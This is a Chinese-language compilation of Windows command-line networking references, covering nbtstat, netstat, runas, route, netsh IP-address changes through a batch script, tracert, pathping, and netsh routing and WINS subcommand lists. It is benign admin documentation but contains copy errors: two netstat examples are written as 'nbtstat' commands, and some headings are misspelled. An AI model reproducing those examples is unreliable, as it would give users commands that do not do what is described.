显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。
语法
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]
参数
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。NetBIOS 名称表是运行在该计算机上的应用程序使用的 NetBIOS 名称列表。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
-c
显示 NetBIOS 名称缓存内容、NetBIOS 名称表及其解析的各个地址。
-n
显示本地计算机的 NetBIOS 名称表。Registered 中的状态表明该名称是通过广播或 WINS 服务器注册的。
-r
显示 NetBIOS 名称解析统计资料。在配置为使用 WINS 的 Windows XP 计算机上,该参数将返回已通过广播和 WINS 解析和注册的名称号码。
-R
清除 NetBIOS 名称缓存的内容并从 Lmhosts 文件中重新加载带有 #PRE 标记的项目。
-RR
重新释放并刷新通过 WINS 注册的本地计算机的 NetBIOS 名称。
-s
显示 NetBIOS 客户和服务器会话,并试图将目标 IP 地址转化为名称。
-S
显示 NetBIOS 客户和服务器会话,只通过 IP 地址列出远程计算机。
Interval
重新显示选择的统计资料,可以中断每个显示之间的 Interval 中指定的秒数。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只显示一次当前的配置信息。
/?
在命令提示符显示帮助。
注释
Nbtstat 命令行参数区分大小写。
下表列出了由 Nbtstat 生成的列标题。标题 说明
Input 接收的字节数。
Output 发送的字节数。
In/Out 该连接是否从计算机(传出)或者其他计算机到本地计算机(传入)。
Lift 名称表缓存项在被清除之前所存留的时间。
Local Name 本地 NetBIOS 名称与连接相关联。
Remote Host 与远程计算机相关的名称或 IP 地址。
<03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。
Type 名称类型。名称可以是单个名称,也可以是组名称。
Status 远程计算机上是否在运行 NetBIOS 服务("已注册"),或同一计算机名是否已注册了相同的服务("冲突")。
State NetBIOS 连接的状态。
下表列出了可能的 NetBIOS 连接状态。状态 说明
已连接 会话已建立。
关联 连接的终结点已经被创建并与 IP 地址关联。
正接听 该终结点对内向连接可用。
空闲 该结束点已被打开单不能接收连接。
正在连接 会话处于连接阶段。在此阶段正在解析所选目标的由名称到 IP 地址的映射。
接受 入站会话当前正在被接受,将在短期内连接。
重新连接 会话将试图重新连接(如果第一次连接失败)。
出站 会话正处于连接阶段。此阶段正在创建 TCP 连接。
入站 入站会话在连接期。
正在断开 会话正在断开连接。
已中断连接 本地计算机已断开连接,并正等待远程系统的确认。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 NetBIOS 计算机名为 CORP07 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -a CORP07
要显示所分配 IP 地址为 10.0.0.99 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -A 10.0.0.99
要显示本地计算机的 NetBIOS 名称表,请键入:
nbtstat -n
要显示本地计算机 NetBIOS 名称缓存的内容,请键入:
nbtstat -c
要清除 NetBIOS 名称缓存并重新装载本地 Lmhosts 文件中带标记 #PRE 的项目,请键入:
nbtstat -R
要释放通过 WINS 服务器注册的 NetBIOS 名称并对其重新注册,请键入:
nbtstat -RR
要每隔 5 秒以 IP 地址显示 NetBIOS 会话统计资料,请键入:
nbtstat -S 5
17.Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
语法
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
参数
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
-e
显示以太网统计信息,如发送和接收的字节数、数据包数。该参数可以与 -s 结合使用。
-n
显示活动的 TCP 连接,不过,只以数字形式表现地址和端口号,却不尝试确定名称。
-o
显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的"进程"选项卡上找到基于 PID 的应用程序。该参数可以与 -a、-n 和 -p 结合使用。
-p Protocol
显示 Protocol 所指定的协议的连接。在这种情况下,Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果该参数与 -s 一起使用按协议显示统计信息,则 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。
-s
按协议显示统计信息。默认情况下,显示 TCP、UDP、ICMP 和 IP 协议的统计信息。如果安装了 Windows XP 的 IPv6 协议,就会显示有关 IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 协议的统计信息。可以使用 -p 参数指定协议集。
-r
显示 IP 路由表的内容。该参数与 route print 命令等价。
Interval
每隔 Interval 秒重新显示一次选定的信息。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只打印一次选定的信息。
/?
在命令提示符显示帮助。
注释
与该命令一起使用的参数必须以连字符 (-) 而不是以短斜线 (/) 作为前缀。
Netstat 提供下列统计信息:
Proto
协议的名称(TCP 或 UDP)。
Local Address
本地计算机的 IP 地址和正在使用的端口号。如果不指定 -n 参数,就显示与 IP 地址和端口的名称对应的本地计算机名称。如果端口尚未建立,端口以星号(*)显示。
Foreign Address
连接该插槽的远程计算机的 IP 地址和端口号码。如果不指定 -n 参数,就显示与 IP 地址和端口对应的名称。如果端口尚未建立,端口以星号(*)显示。
(state)
表明 TCP 连接的状态。可能的状态如下:
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
有关 TCP 连接状态的信息,请参阅 RFC 793。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要想显示以太网统计信息和所有协议的统计信息,请键入下列命令:
netstat -e -s
要想仅显示 TCP 和 UDP 协议的统计信息,请键入下列命令:
netstat -s -p tcp udp
要想每 5 秒钟显示一次活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -o 5
要想以数字形式显示活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -n -o
18.Runas
允许用户用其他权限运行指定的工具和程序,而不是用户当前登录提供的权限。
语法
runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program
参数
/profile
加载用户的配置文件。/profile 是默认值。
/no profile
/noprofile 指定不加载用户的配置文件。这使应用程序载入的更加快速,但是在一些应用程序中也会引起错误。
/env
指定当前使用的网络环境,而不是用户的本地环境。
/netonly
指明指定的用户信息只用于远程访问。
/smartcard
/smartcard 表示凭据是否是由智能卡提供的。
/showtrustlevels
列出 /trustlevel 开关项。
/trustlevel
指定应用程序运行所在的授权级别。使用 /showtrustlevels 查看可用的信任级别。
/user:UserAccountName
指定在其下运行程序的用户帐户的名称。用户帐户的格式应是 user@domain 或 domain\user。
程序
指定要用在 /user 中指定的帐户运行的程序或命令。
/?
在命令提示符显示帮助。
注释
管理员可以使用一个权限受限制的帐户执行日常、非管理性的任务,只有在执行特定管理任务时,才使用一个权限更大的帐户。要不经过注销再重新登录就完成这样的任务,可以用一般帐户登录,然后使用 runas 命令来运行需要更大权限的工具。
有关 runas 命令的使用范例,请参阅"相关主题"。
尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或"控制面板"项。
如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
如果想以域管理员身份使用这个命令,键入下列参数之一:
/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及"控制面板"项。作为另一组(例如"Users"或"Power Users"组)的成员登录到计算机时,可以以管理员的身份运行。
可以使用 runas 命令来启动任何程序、MMC 控制器或"控制面板"项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、"控制面板"项在系统中及对该用户帐户均可用.
runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。
如果尝试使用 runas 从网络位置启动程序、MMC 控制台或"控制面板"项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。
有些项,例如"打印机"文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。
如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在"计算机管理"中单击"服务和应用程序",然后单击"服务"。要测试用户帐户,请尝试使用该帐户登录合适的域。
范例
要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例,请键入:
runas /user:localmachinename\administrator cmd
系统提示时,键入管理员密码。
要使用名为 companydomain\domainadmin 的域管理员帐户启动"计算机管理"管理单元实例,请键入:runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc"
当提示时,键入帐户密码。
要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动"记事本"实例,请键入:
runas /user:user@domain.microsoft.com "notepad my_file.txt"
当提示时,键入帐户密码。
要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例,请键入:
runas /netonly /user:domain\username "command"
domain\username 必须是有足够权限管理服务器的用户。当提示时,键入帐户密码。
19.Route
在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。
语法
route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]
参数
-f
清除所有不是主路由(网掩码为 255.255.255.255 的路由)、环回网络路由(目标为 127.0.0.0,网掩码为 255.255.255.0 的路由)或多播路由(目标为 224.0.0.0,网掩码为 240.0.0.0 的路由)的条目的路由表。如果它与命令之一(例如 add、change 或 delete)结合使用,表会在运行命令之前清除。
-p
与 add 命令共同使用时,指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下,启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时,则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes。
Command
指定要运行的命令。下表列出了有效的命令。命令 目的
add 添加路由
change 更改现存路由
delete 删除路由
print 打印路由
Destination
指定路由的网络目标地址。目标地址可以是一个 IP 网络地址(其中网络地址的主机地址位设置为 0),对于主机路由是 IP 地址,对于默认路由是 0.0.0.0。
mask subnetmask
指定与网络目标地址相关联的网掩码(又称之为子网掩码)。子网掩码对于 IP 网络地址可以是一适当的子网掩码,对于主机路由是 255.255.255.255 ,对于默认路由是 0.0.0.0。如果忽略,则使用子网掩码 255.255.255.255。定义路由时由于目标地址和子网掩码之间的关系,目标地址不能比它对应的子网掩码更为详细。换句话说,如果子网掩码的一位是 0,则目标地址中的对应位就不能设置为 1。
Gateway
指定超过由网络目标和子网掩码定义的可达到的地址集的前一个或下一个跃点 IP 地址。对于本地连接的子网路由,网关地址是分配给连接子网接口的 IP 地址。对于要经过一个或多个路由器才可用到的远程路由,网关地址是一个分配给相邻路由器的、可直接达到的 IP 地址。
metric Metric
为路由指定所需跃点数的整数值(范围是 1 ~ 9999),它用来在路由表里的多个路由中选择与转发包中的目标地址最为匹配的路由。所选的路由具有最少的跃点数。跃点数能够反映跃点的数量、路径的速度、路径可靠性、路径吞吐量以及管理属性。
if Interface
指定目标可以到达的接口的接口索引。使用 route print 命令可以显示接口及其对应接口索引的列表。对于接口索引可以使用十进制或十六进制的值。对于十六进制值,要在十六进制数的前面加上 0x。忽略 if 参数时,接口由网关地址确定。
/?
在命令提示符显示帮助。
注释
路由表中 跃点数 一列的值较大是由于允许 TCP/IP 根据每个 LAN 接口的 IP 地址、子网掩码和默认网关的配置自动确定路由表中路由的跃点数造成的。默认启动的自动确定接口跃点数确定了每个接口的速度,调整了每个接口的路由跃点数,因此最快接口所创建的路由具有最低的跃点数。要删除大跃点数,请在每个 LAN 连接的 TCP/IP 协议的高级属性中禁用自动确定接口跃点数。
如果在 systemroot\System32\Drivers\Etc 文件夹的本地网络文件中存在适当的条目,名称可以用于 Destination。只要名称可以通过"域名系统" (DNS) 查询这样的标准主机名解析技术分解为 IP 地址,就可以将其用于 Gateway,DNS 查询使用存储在 systemroot\System32\Drivers\Etc 文件夹下的本地主机文件和 NetBIOS 名称解析。
如果是 print 或 delete 命令,可以忽略 Gateway 参数,使用通配符来表示目标和网关。Destination 的值可以是由星号 (*) 指定的通配符。如果指定目标含有一个星号 (*) 或问号 (?),它被看作是通配符,只打印或删除匹配的目标路由。星号代表任意一字符序列,问号代表任一字符。例如,10.*.1, 192.168.*、 127.* 和 *224* 都是星号通配符的有效使用。
使用了无效的目标和子网掩码(网掩码)值的组合,会显示"Route:bad gateway address netmask"错误消息。目标中有一位或多位设置为 1,而其在子网掩码中的对应位设置为 0 时会发生这个错误。可以通过二进制表示法表示目标和子网掩码来检查这种情况。以二进制表示的子网掩码包括表示目标网络地址部分的一连串的 1 和表示目标主机地址部分的一连串的 0 两个部分。查看目标以确定目标的主机地址部分(由子网掩码所定义)是否有些位设置成了 1。
只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 参数。Windows 95 或 Windows 98 的 route 命令不支持该参数。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 IP 路由表的完整内容,请键入:
route print
要显示 IP 路由表中以 10.开始的路由,请键入:
route print 10.*
要添加默认网关地址为 192.168.12.1 的默认路由,请键入:
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的永久路由,请键入:
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,跃点数为 7 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,接口索引为 0x3 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
要删除目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由,请键入:
route delete 10.41.0.0 mask 255.255.0.0
要删除 IP 路由表中以 10.开始的所有路由,请键入:
route delete 10.*
要将目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由的下一个跃点地址由 10.27.0.1 更改为 10.27.0.25,请键入:
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
怎样在windowsserver的cmd下更改ip地址■■■ -> Windows 2k/2003 Server
在命令行下更改ip地址
Windows2000是现在比较流行的操作系统,它的功能是很强大的,它甚至可以象Unix一样在命令行下做很多的工作。下面一种在命令行下更改ip地址的方法,现介绍给大家(括号里是一些注释,黑体字是人工录入的):
C:\>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址)
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix .:
IP Address............: 10.1.1.94 (本地连接更改之前的ip)
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
C:\>netsh (进入设置模式)
netsh>interface
interface>ip
interface ip>set address "本地连接" static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
上文中的set命令具体解释如下:
set address - 设置指定的接口的 IP 地址和默认网关。
set dns - 设置 DNS 服务器模式和地址。
set wins - 设置 WINS 服务器模式和地址。
网络常用命令:
IPCONFIG
C:\>ipconfig (更改后再用ipconfig命令看一下,确认一下是否更改成功)
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix .
IP Address............: 10.1.1.111
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
命令一览
..- 移到上一层上下文级。
? - 显示命令列表。
aaaa - 更改到 `aaaa' 上下文。
abort - 丢弃在脱机模式下所做的更改。
add - 将一个配置项添加到项目列表中。
alias - 添加一个别名
bye - 退出程序。
commit - 提交在脱机模式中所做的更改。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp' 上下文。
dump - 显示一个配置脚本。
exec - 运行一个脚本文件。
exit - 退出程序。
help - 显示命令列表。
interface - 更改到 `interface' 上下文。
offline - 将当前模式设置成脱机。
online - 将当前模式设置成联机。
popd - 从堆栈上打开一个上下文。
pushd - 将当前上下文放推入堆栈。
quit - 退出程序。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置设置。
show - 显示信息
unalias - 删除一个别名。
wins - 更改到 `wins' 上下文。
快速切换IP地址有绝招
在工作过程中会遇到在不同的网段中进行网络调试的情况,经常需要将机器在几个不同的IP地址中进行切换。在Win2000操作系统中改变IP地址较之Win98已经方便多了因为改完IP地址后不需要重启计算机 ,但还要进入网络属性设置中进行操作。有没有再简便一点的方法呢,比如用鼠标双击一下快捷方式就可以实现IP地址的切换?
答案是肯定的。在Win2000中用netsh命令就可以实现这个功能。首先进入命令行模式(在"开始→运行"中键入"cmd"即可进入命令行模式),在提示符下键入netsh即可进入netsh的界面。再键入int ip进入接口IP的配置模式,键入dump则列出接口IP配置信息:
C:\Documents and Settings\Administrator>netsh
netsh>
netsh>int ip
interface ip>dump
# ----------------------------------
# 接口 IP 配置
# ----------------------------------
pushd interface ip
# ″本地连接″ 的接口IP 配置(注:以下显示视具体机器情况而定)
set address name = ″本地连接″ source = static addr = 192.168.0.5 mask = 255.255.255.0
set address name = ″本地连接″ gateway = 192.168.0.2 gwmetric = 1
set dns name = ″本地连接″ source = static addr = 61.237.17.181
add dns name = ″本地连接″ addr = 211.97.168.129
add dns name = ″本地连接″ addr = 211.98.4.1
set wins name = ″本地连接″ source = static addr = none
# ″本地连接 2″ 的接口 IP 配置
set address name = ″本地连接 2″ source = dhcp
set dns name = ″本地连接 2″ source = dhcp
set wins name = ″本地连接 2″ source = dhcp
popd
# 接口 IP 配置结束
快速切换IP地址有绝招 2
现在我们可以大致了解到用netsh命令更改IP地址的方式,即通过"set address name =连接名称(连接名称要用引号括起来)source=static addr=IP地址 mask=子网掩码"来实现。
到命令行模式下用netsh直接试一下。比如要将本机的IP地址改为192.168.0.7,子网掩码为255.255.255.0,可以进行以下操作:
C:\Documents and Settings\Administrator>netsh
netsh>int ip
interface ip>set address name ="本地连接"source = static addr = 192.168.0.7 mask = 255.255.255.0
确认更改。
interface ip>exit
再用ipconfig命令核实一下:
C:\Documents and Settings\Administrator>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接 2
Media State ........... Cable Disconnected
Ethernet adapter 本地连接
Connection-specific DNS Suffix .
IP Address............ 192.168.0.7
Subnet Mask ........... 255.255.255.0
Default Gateway ......... 192.168.0.2
从以上显示中可以看到已经成功实现了在Win2000中用命令行方式来改变IP地址。用这种方式改变IP地址甚至还没有在图形界面中操作来得快。不过我们再用脚本帮一下忙,离胜利目标就不远了。首先打开记事本,输入以下内容:  int ip
set address name=″本地连接″ source=static addr=192.168.0.7 mask=255.255.255.0
然后保存为一个名为"7.sh"的文件,放到C盘根目录下,再进入命令行模式,在C盘根目录下键入"netsh exec 7.sh",好像没什么反应啊?不过再用ipconfig查看一下,会发现IP地址已经改过来了。
最后再用记事本写一个批处理文件,命名为"7.bat",内容为"netsh exec 7.sh"。为该文件在桌面上创建一个快捷方式,这样双击该快捷方式即可实现IP地址的快速改变。如果要快速在192.168.0.5、192.168.0.7等相同网段IP地址间进行切换的话,只需要改变"addr"后面的地址即可,但是要将IP地址改为如172.19.96.7之类不同网段的IP地址,就需要将网关信息一起改变,也就是在脚本文件中加入一行关于网关的信息:
int ip
set address name = ″本地连接″source = static addr= 172.19.96.7 mask = 255.255.255.0
set address name = ″本地连接″gateway = 172.19.96.1 gwmetric = 1
同样地将以上内容存为脚本文件,再做成批处理文件执行一下,用ipconfig/all命令检测一下,发现包括网关在内的信息也修改过来了。这是不是既快又方便,IP地址想换就换?
使用 netstat 显示连接统计
可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示 Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n,则不能将地址和端口号转换成名称。
Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。
-d 指定不将IP 地址解析到主机名称。
-h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。
-j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。
-w timeout 等待 timeout 为每次回复所指定的毫秒数。
target_name 目标主机的名称或 IP 地址。
pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。
-n Hostnames 不将地址解析成主机名。
-h Maximum hops 搜索目标的最大跃点数。
-g Host-list 沿着路由列表释放源路由。
-p Period 在 ping 之间等待的毫秒数。
-q Num_queries 每个跃点的查询数。
-w Time-out 为每次回复所等待的毫秒数。
-T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。
-R RSVP test Che 检查以确定路径中的每个路由器是否支持"资源保留协议 (RSVP)",此协议允许主机为数据流保留一定量的带宽。-R 开关用于测试服务质量 (QoS) 连通性。
在命令提示符下交互使用 DHCP 命令
打开 命令提示符。
键入 netsh。
在 netsh>(Netshell) 命令提示行键入"dhcp"。
在 dhcp>(DHCP 辅助程序)命令提示行,为您要管理的服务器键入 server \\servername 或 server ip_address。
一旦您有权管理的服务器已成功连接,则会看到"您可以对服务器 servername 进行读写访问"
一旦连接成功,您就可以使用用于 DHCP 的任何支持的 Netshell 命令。键入 /? 或 help 来显示直接的 DHCP 子命令菜单或作为选项显示,键入 list 列出可与 DHCP 一起使用的所有 Netshell 子命令。
route 的命令
routing ip add/delete/set/show interface 在指定接口上添加、删除、配置或显示常规 IP 路由设置。
routing ip add/delete/set/show filter 在指定接口上添加、删除、配置或显示 IP 数据包筛选器。
routing ip add/delete/show boundary 在指定接口上添加、删除或显示多播边界设置。
routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。
routing ip add/delete/set/show rtmroute 添加、配置或显示不持续的路由表管理器路由。
routing ip add/delete/set/show persistentroute 添加、删除、配置或显示持续路由。
routing ip add/delete/set/show preferenceforprotocol 添加、删除、配置或显示路由协议的优先级。
routing ip add/delete/set/show scope 添加、删除或显示多播作用域。
routing ip set/show loglevel 配置或显示全局 IP 记录等级。
routing ip show helper 显示 IP 的所有 Netsh 实用程序子环境。
routing ip show protocol 显示所有正在运行的 IP 路由协议。
routing ip show mfe 显示多播转发项。
routing ip show mfestats 显示多播转发项统计。
routing ip show boundarystats 显示 IP 多播边界。
routing ip show r*estinations 显示路由表管理器路由表中的目标。
routing ip show rtmroutes 显示路由表管理器路由表中的路由。
routing ip nat set/show global 配置或显示全局网络地址转换 (NAT) 设置。
routing ip nat add/delete/set/show interface 添加、删除、配置或显示指定接口的 NAT 设置。
routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或删除一个地址范围。
routing ip nat add/delete addressmapping 添加或删除 NAT 地址映射。
routing ip nat add/delete portmapping 添加或删除 NAT 端口映射。
routing ip autodhcp set/show global 配置或显示全局 DHCP 分配器参数。
routing ip autodhcp set/show interface 配置或显示指定接口的 DHCP 分配器设置。
routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范围中添加或删除一个排除范围。
routing ip dnsproxy set/show global 配置或显示全局 DNS 代理参数。
routing ip dnsproxy set/show interface 配置或显示指定接口的 DNS 代理参数。
routing ip igmp set/show global 配置或显示 IGMP 全局设置。
routing ip igmp add/delete/set/show interface 在指定接口上添加、删除、配置或显示 IGMP。
routing ip igmp add/delete staticgroup 添加或删除指定接口的静态多播组。
routing ip igmp show grouptable 显示 IGMP 主机组表。
routing ip igmp show ifstats 显示每个接口的 IGMP 统计。
routing ip igmp show iftable 显示每个接口的 IGMP 主机组。
routing ip igmp show proxygrouptable 显示 IGMP 代理接口的 IGMP 组表。
routing ip igmp show rasgrouptable 显示远程访问服务器所使用的 Internet 接口的组表。
routing ip ospf set/show global 配置或显示全局 OSPF 设置。
routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置或显示 OSPF。
routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。
routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。
routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。
routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。
routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。
routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。
routing ip ospf show areastats 显示 OSPF 区域统计。
routing ip ospf show lsdb 显示 OSPF 链接状态数据库。
routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。
routing ip relay set global 配置"DHCP 中继代理程序"的全局设置。
routing ip relay add/delete/set interface 在指定接口上添加、删除或配置"DHCP 中继代理程序"设置。
routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。
routing ip relay show ifbinding 显示接口的 IP 地址绑定。
routing ip relay show ifconfig 显示每个接口的"DHCP 中继代理程序"配置。
routing ip relay show ifstats 显示每个接口的 DHCP 统计。
routing ip rip set/show global 配置 IP 的 RIP 全局设置。
routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的 RIP 设置。
routing ip rip add/delete peerfilter 添加或删除 RIP 对等筛选器。
routing ip rip add/delete acceptfilter 在接受的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete announcefilter 在公布的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete/show neighbor 添加或删除 RIP 邻居。
routing ip rip set/show flags 在指定接口上配置 IP RIP 高级设置。
routing ip rip show globalstats 显示全局 RIP 参数。
routing ip rip show ifbinding 显示接口的 IP 地址绑定。
routing ip rip show ifstats 显示每个接口的 RIP 统计。
IPX netsh 路由命令
routing ipx add/set staticroute 在 IPX 路由表中添加或配置静态 IPX 路由。
routing ipx add/set staticservice 在 SAP 服务表中添加或配置静态 SAP 服务。
routing ipx add/set filter 在指定的接口上添加或配置 IPX 数据包筛选器。
routing ipx add/set interface 在请求拨号接口上启用 IPX 路由,或在指定的接口上配置 IPX 设置。
routing ipx set global 配置全局 IPX 路由设置。
routing ipx rip add/set filter 添加和配置 RIP 路由筛选器。
routing ipx rip set global 配置全局 IPX 的 RIP 设置。
routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 设置。
routing ipx sap add/set filter 添加或配置 SAP 服务筛选器。
routing ipx sap set global 配置全局 IPX 的 SAP 设置。
routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 设置。
routing ipx netbios add nbname 将静态 NETBIOS 名称添加到 IPX NetBIOS 名称表中。
routing ipx netbios set interface 在指定接口上配置基于 IPX 的 NetBIOS 设置。
WINS NetSh 命令
list 列出所有可用的 WINS 命令。
dump 将 WINS 服务器配置转储到命令输出。
add name 在服务器上注册名称。详细信息,请输入 add name /?
add partner 向服务器添加复制伙伴。详细信息,请输入 add partner /?
add pngserver 添加当前服务器的 Persona Non Grata 服务器列表。详细信息,请输入 add pngserver /?
check database 检查数据库的一致性。详细信息,请输入 check database /?
check name 检查一组 WINS 服务器的名称记录列表。详细信息,请输入 check name /?
check version 检查版本号的一致性。详细信息,请输入 check version /?
delete name 从服务器数据库中删除已注册的名称。详细信息,请输入 delete name /?
delete partner 从复制伙伴列表中删除复制伙伴。详细信息,请输入 delete partner /?
delete records 从服务器删除或逻辑删除所有记录或一组记录。详细信息,请输入 delete records /?
delete owners 删除所有者列表及其记录。详细信息,请输入 delete owners /?
delete pngserver 从列表中删除所有的或选定的 Persona Non Grata 服务器。详细信息,请输入 delete pngserver /?
init backup 备份 WINS 数据库。详细信息,请输入 init backup /?
init import 从 Lmhosts 文件导入数据。详细信息,请输入 init import /?
init pull 启动"拉"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init pull /?
init pullrange 开始另一台 WINS 服务器的一组记录,并读取该记录。详细信息,请输入 init pullrange /?
init push 启动"推"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init push /?
